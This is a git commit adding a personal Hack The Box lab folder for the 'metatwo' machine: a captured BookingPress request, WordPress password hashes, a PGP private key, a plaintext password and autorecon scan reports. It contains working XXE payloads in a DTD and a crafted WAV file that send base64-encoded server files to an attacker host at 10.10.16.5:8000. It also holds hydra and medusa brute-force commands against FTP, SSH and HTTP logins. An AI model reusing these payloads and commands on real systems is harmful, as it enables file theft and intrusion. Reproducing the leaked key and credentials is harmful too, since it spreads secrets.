init htb

old htb folders
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
--- a/HTB/metatwo/appointment.req
+++ b/HTB/metatwo/appointment.req
@@ -0,0 +1,14 @@
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: metapress.htb
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json, text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1006
+Origin: http://metapress.htb
+Connection: close
+Referer: http://metapress.htb/events/
+Cookie: PHPSESSID=rcu9pjs0rv3cdgngvjlqbi0le6
+
+action=bookingpress_front_save_appointment_booking&appointment_data%5Bselected_category%5D=1&appointment_data%5Bselected_cat_name%5D=&appointment_data%5Bselected_service%5D=1&appointment_data%5Bselected_service_name%5D=Startup%20meeting&appointment_data%5Bselected_service_price%5D=%240.00&appointment_data%5Bservice_price_without_currency%5D=0&appointment_data%5Bselected_date%5D=2023-01-27&appointment_data%5Bselected_start_time%5D=12%3A00&appointment_data%5Bselected_end_time%5D=12%3A30&appointment_data%5Bcustomer_name%5D=&appointment_data%5Bcustomer_firstname%5D=fname&appointment_data%5Bcustomer_lastname%5D=lname&appointment_data%5Bcustomer_phone%5D=12345678&appointment_data%5Bcustomer_email%5D=email%40example.com&appointment_data%5Bappointment_note%5D=note&appointment_data%5Bselected_payment_method%5D=&appointment_data%5Bcustomer_phone_country%5D=BB&appointment_data%5Btotal_services%5D=&appointment_data%5Bstime%5D=1674677898&appointment_data%5Bspam_captcha%5D=xrv6WZBaomY7&_wpnonce=8db3188c79
--- a/HTB/metatwo/backdoor.php
+++ b/HTB/metatwo/backdoor.php
--- a/HTB/metatwo/hashes.txt
+++ b/HTB/metatwo/hashes.txt
@@ -0,0 +1,2 @@
+admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
+manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
--- a/HTB/metatwo/issues.dtd
+++ b/HTB/metatwo/issues.dtd
@@ -0,0 +1,2 @@
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/issues">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.16.5:8000/?%data;'>">
--- a/HTB/metatwo/keys.txt
+++ b/HTB/metatwo/keys.txt
@@ -0,0 +1,42 @@
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+
+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
+fo6KI+w2uXLaw+bIT1XZurDN
+=dqsF
+-----END PGP PUBLIC KEY BLOCK-----
--- a/HTB/metatwo/keys2.txt
+++ b/HTB/metatwo/keys2.txt
@@ -0,0 +1,45 @@
+-----BEGIN PGP PRIVATE KEY BLOCK-----
+
+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
+=7Uo6
+-----END PGP PRIVATE KEY BLOCK-----
--- a/HTB/metatwo/passes
+++ b/HTB/metatwo/passes
@@ -0,0 +1 @@
+partylikearockstar
--- a/HTB/metatwo/passpie.hash
+++ b/HTB/metatwo/passpie.hash
@@ -0,0 +1 @@
+Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local>::keys2.txt
--- a/HTB/metatwo/payload.wav
+++ b/HTB/metatwo/payload.wav
@@ -0,0 +1,7 @@
+RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY % sp SYSTEM "http://10.10.16.5:8000/xxe.dtd">
+%sp;
+%param1;
+]>
+<r>&exfil;</r>>
--- a/HTB/metatwo/results/report/local.txt
+++ b/HTB/metatwo/results/report/local.txt
--- a/HTB/metatwo/results/report/notes.txt
+++ b/HTB/metatwo/results/report/notes.txt
@@ -0,0 +1,12 @@
+[*] ftp found on tcp/21.
+
+
+
+[*] ssh found on tcp/22.
+
+
+
+[*] http found on tcp/80.
+
+
+
--- a/HTB/metatwo/results/report/proof.txt
+++ b/HTB/metatwo/results/report/proof.txt
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Commands.md
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Commands.md
@@ -0,0 +1,33 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -p 21 --script="banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp21/xml/tcp_21_ftp_nmap.xml" 10.10.11.186
+
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.186
+
+feroxbuster -u http://10.10.11.186:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
+
+curl -sSikf http://10.10.11.186:80/.well-known/security.txt
+
+curl -sSikf http://10.10.11.186:80/robots.txt
+
+curl -sSik http://10.10.11.186:80/
+
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.186
+
+curl -sk -o /dev/null -H "Host: yQBDdkqpvKEGuxwSOHam.metapress.htb" http://metapress.htb:80/ -w "%{size_download}"
+
+whatweb --color=never --no-errors -a 3 -v http://10.10.11.186:80 2>&1
+
+wkhtmltoimage --format png http://10.10.11.186:80/ /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_screenshot.png
+
+ffuf -u http://metapress.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.metapress.htb" -fs 145 -noninteractive -s | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_metapress.htb_vhosts_subdomains-top1million-110000.txt"
+
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Manual
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Manual
@@ -0,0 +1,43 @@
+```bash
+[*] ftp on tcp/21
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_hydra.txt" ftp://10.10.11.186
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 21 -O "/home/kali/htb/metatwo/results/scans/tcp21/tcp_21_ftp_medusa.txt" -M ftp -h 10.10.11.186
+
+[*] ssh on tcp/22
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.186
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/metatwo/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.186
+
+[*] http on tcp/80
+
+	[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
+
+		feroxbuster -u http://10.10.11.186:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
+
+	[-] Credential bruteforcing commands (don't run these without modifying them):
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.186/path/to/auth/area
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.186 -m DIR:/path/to/auth/area
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.186/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.186 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
+
+	[-] (nikto) old but generally reliable web server enumeration tool:
+
+		nikto -ask=no -h http://10.10.11.186:80 2>&1 | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_nikto.txt"
+
+	[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
+
+		wpscan --url http://10.10.11.186:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/metatwo/results/scans/tcp80/tcp_80_http_wpscan.txt"
+
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Patterns.md
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Patterns.md
@@ -0,0 +1,2 @@
+Identified HTTP Server: nginx/1.18.0
+
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Port
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Port
@@ -0,0 +1,48 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.186
+```
+
+[/home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt](file:///home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Wed Jan 25 11:09:20 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/metatwo/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_full_tcp_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.037s latency).
+Scanned at 2023-01-25 11:09:20 EST for 565s
+Not shown: 65532 closed tcp ports (conn-refused)
+PORT   STATE SERVICE REASON  VERSION
+21/tcp open  ftp     syn-ack
+| fingerprint-strings: 
+|   GenericLines: 
+|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+|     Invalid command: try being more creative
+|     Invalid command: try being more creative
+|   Verifier: 
+|_    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=
+|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=
+|   256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2
+80/tcp open  http    syn-ack nginx 1.18.0
+|_http-title: Did not follow redirect to http://metapress.htb/
+| http-methods: 
+|_  Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: nginx/1.18.0
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port21-TCP:V=7.93%I=9%D=1/25%Time=63D15443%P=x86_64-pc-linux-gnu%r(Gene
+SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
+SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
+SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
+SF:\r\n")%r(Verifier,33,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::fff
+SF:f:10\.10\.11\.186\]\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Wed Jan 25 11:18:46 2023 -- 1 IP address (1 host up) scanned in 565.53 seconds
+
+```
--- a/HTB/metatwo/results/report/report.md/10.10.11.186/Port
+++ b/HTB/metatwo/results/report/report.md/10.10.11.186/Port
@@ -0,0 +1,48 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.186
+```
+
+[/home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt](file:///home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Wed Jan 25 11:09:20 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/metatwo/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/metatwo/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.186
+Nmap scan report for metatwo.htb (10.10.11.186)
+Host is up, received user-set (0.026s latency).
+Scanned at 2023-01-25 11:09:20 EST for 559s
+Not shown: 997 closed tcp ports (conn-refused)
+PORT   STATE SERVICE REASON  VERSION
+21/tcp open  ftp     syn-ack
+| fingerprint-strings: 
+|   GenericLines: 
+|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+|     Invalid command: try being more creative
+|     Invalid command: try being more creative
+|   Verifier: 
+|_    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
+22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
+| ssh-hostkey: 
+|   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=
+|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=
+|   256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2
+80/tcp open  http    syn-ack nginx 1.18.0
+|_http-title: Did not follow redirect to http://metapress.htb/
+|_http-server-header: nginx/1.18.0
+| http-methods: 
+|_  Supported Methods: GET HEAD POST OPTIONS
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port21-TCP:V=7.93%I=9%D=1/25%Time=63D1543C%P=x86_64-pc-linux-gnu%r(Gene
+SF:ricLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\
+SF:.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
+SF:ative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative
+SF:\r\n")%r(Verifier,33,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::fff
+SF:f:10\.10\.11\.186\]\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
